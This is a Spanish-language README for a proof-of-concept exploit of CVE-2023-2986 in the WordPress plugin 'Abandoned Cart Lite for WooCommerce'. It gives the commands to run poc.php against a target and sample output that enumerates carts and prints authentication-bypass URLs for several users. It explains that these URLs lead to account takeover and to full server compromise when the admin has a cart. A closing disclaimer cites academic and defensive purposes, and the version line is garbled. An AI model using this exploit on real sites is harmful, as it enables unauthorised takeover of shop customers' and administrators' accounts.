
Prueba de concepto para la vulnerabilidad CVE-2023-2986 en el plugin 'Abandoned Cart Lite for WooCommerce' en WordPress
Prueba de Concepto para la vulnerabilidad CVE-2023-2986 en el plugin 'Abandoned Cart Lite for WooCommerce' de WordPress
version <= 5.14.2version <= 5.15.15.15.05.15.2Se pensaba que la versión 5.15.0 solucionaba el problema, pero descubrí que no se había solucionado por completo y se ha actualizado. Así que la versión parcheada real es 5.15.2
sudo apt-get install php-curl
php poc.php http://target_host target_port max_cart_id_to_enumerate
[*] Enumerating cart ID : 1
[+] Authentication Bypass URL for user 'victim' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=pwDHtAFjg2StEr4S2bP9YXkwVdKLqnsLjpkFGythB5ztEF8twVbXFdEP6u7kYwrc
[*] Enumerating cart ID : 2
[*] Enumerating cart ID : 3
[+] Authentication Bypass URL for user 'victim2' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=aQH9pwVjg2TWqKcFmNoipUeBKbYNb5UaEYMYP8DlCz3DqykRdzP3lQgEqID6QsoD
[*] Enumerating cart ID : 4
[+] Authentication Bypass URL for user 'user' : https://10.39.44.149:443/?wcal_action=checkout_link&validate=XQOexwdjg2TzUjbZJgcYAeUE1p7YdPytSYL3Vkkjb+gISKD02Cpk+3Dx6SUnbe5d
[*] Enumerating cart ID : 5
Al ingresar la URL en el navegador, obtendrá acceso a la cuenta del usuario respectivo. Si el propio usuario administrador de wordpress tiene una entrada, esto dará acceso a la consola de administración, lo que lleva a un compromiso total del servidor de wordpress.
Esta Prueba de Concepto (POC) ha sido creada puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinada a ser utilizada para atacar sistemas excepto donde esté explícitamente autorizada. El autor no es responsable de ningún uso indebido de la POC. Úsela de manera responsable.